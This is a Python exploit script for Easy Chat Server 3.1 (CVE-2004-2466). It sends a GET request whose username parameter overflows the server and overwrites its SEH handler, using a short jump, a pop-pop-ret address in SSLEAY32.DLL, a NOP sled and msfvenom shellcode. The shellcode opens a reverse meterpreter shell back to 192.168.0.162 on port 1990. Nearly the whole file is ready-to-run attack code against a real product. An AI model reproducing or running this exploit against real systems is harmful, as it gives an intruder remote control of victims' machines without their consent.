#!/usr/bin/python # Easy Chat Server 3.1 Remote Exploit # Written by r00tpgp @ http://www.r00tpgp.com # Usage: python easychat-exploit.py <victim-ip> <port> # Spawns reverse meterpreter LHOST=192.168.0.162 LPORT=1990 # CVE: CVE-2004-2466 # Installer: http://www.echatserver.com/ # Tested on Windows 7 32b SP1 import sys, socket, time host = sys.argv[1] # Recieve IP from user port = int(sys.argv[2]) # Recieve Port from user #msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.162 LPORT=1990 -f python -b "\x00\x20" buf = "" buf += "\xbe\x4e\xdd\xd4\x27\xd9\xe9\xd9\x74\x24\xf4\x5b\x29" buf += "\xc9\xb1\x54\x31\x73\x13\x83\xc3\x04\x03\x73\x41\x3f" buf += "\x21\xdb\xb5\x3d\xca\x24\x45\x22\x42\xc1\x74\x62\x30" buf += "\x81\x26\x52\x32\xc7\xca\x19\x16\xfc\x59\x6f\xbf\xf3" buf += "\xea\xda\x99\x3a\xeb\x77\xd9\x5d\x6f\x8a\x0e\xbe\x4e" buf += "\x45\x43\xbf\x97\xb8\xae\xed\x40\xb6\x1d\x02\xe5\x82" buf += "\x9d\xa9\xb5\x03\xa6\x4e\x0d\x25\x87\xc0\x06\x7c\x07" buf += "\xe2\xcb\xf4\x0e\xfc\x08\x30\xd8\x77\xfa\xce\xdb\x51" buf += "\x33\x2e\x77\x9c\xfc\xdd\x89\xd8\x3a\x3e\xfc\x10\x39" buf += "\xc3\x07\xe7\x40\x1f\x8d\xfc\xe2\xd4\x35\xd9\x13\x38" buf += "\xa3\xaa\x1f\xf5\xa7\xf5\x03\x08\x6b\x8e\x3f\x81\x8a" buf += "\x41\xb6\xd1\xa8\x45\x93\x82\xd1\xdc\x79\x64\xed\x3f" buf += "\x22\xd9\x4b\x4b\xce\x0e\xe6\x16\x86\xe3\xcb\xa8\x56" buf += "\x6c\x5b\xda\x64\x33\xf7\x74\xc4\xbc\xd1\x83\x2b\x97" buf += "\xa6\x1c\xd2\x18\xd7\x35\x10\x4c\x87\x2d\xb1\xed\x4c" buf += "\xae\x3e\x38\xf8\xa4\xa8\x03\x55\xb8\x8a\xec\xa4\xb9" buf += "\xcd\x2a\x21\x5f\x81\xe2\x62\xf0\x61\x53\xc3\xa0\x09" buf += "\xb9\xcc\x9f\x29\xc2\x06\x88\xc3\x2d\xff\xe0\x7b\xd7" buf += "\x5a\x7a\x1a\x18\x71\x06\x1c\x92\x70\xf6\xd2\x53\xf0" buf += "\xe4\x02\x02\xfa\xf4\xd2\xaf\xfa\x9e\xd6\x79\xac\x36" buf += "\xd4\x5c\x9a\x98\x27\x8b\x98\xdf\xd7\x4a\xa9\x94\xe1" buf += "\xd8\x95\xc2\x0d\x0d\x16\x13\x5b\x47\x16\x7b\x3b\x33" buf += "\x45\x9e\x44\xee\xf9\x33\xd0\x11\xa8\xe0\x73\x7a\x56" buf += "\xde\xb3\x25\xa9\x35\xc0\x22\x55\xcb\xe4\x8a\x3e\x33" buf += "\xa8\x2a\xbf\x59\x28\x7b\xd7\x96\x07\x74\x17\x56\x82" buf += "\xdd\x3f\xdd\x42\xaf\xde\xe2\x4f\x71\x7f\xe2\x63\xaa" buf += "\x96\x6d\x84\x4d\x97\x8f\xb9\x9b\xae\xe5\xfa\x1f\x95" buf += "\xf6\xb1\x02\xbc\x9c\xb9\x11\xbe\xb4" junk = "A"*217 nseh = "\xeb\x06\x90\x90" # short jump 6 bytes seh = "\x86\xae\x01\x10" # pop pop ret 1001AE86 SSLEAY32.DLL nops = "\x90"*16 header = ( "GET /chat.ghp?username=" + junk + nseh + seh + nops + buf + "&password=&room=1&sex=1 HTTP/1.1\r\n" "User-Agent: Mozilla/4.0\r\n" "Host: 192.168.1.136:80\r\n" "Accept-Language: en-us\r\n" "Accept-Encoding: gzip, deflate\r\n" "Referer: http://192.168.1.136\r\n" "Connection: Keep-Alive\r\n\r\n" ) client = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # Declare a TCP socket client.connect((host, port)) # Connect to user supplied port and IP address client.send(header) # Send the user command with a variable length name client.close() # Close the Connection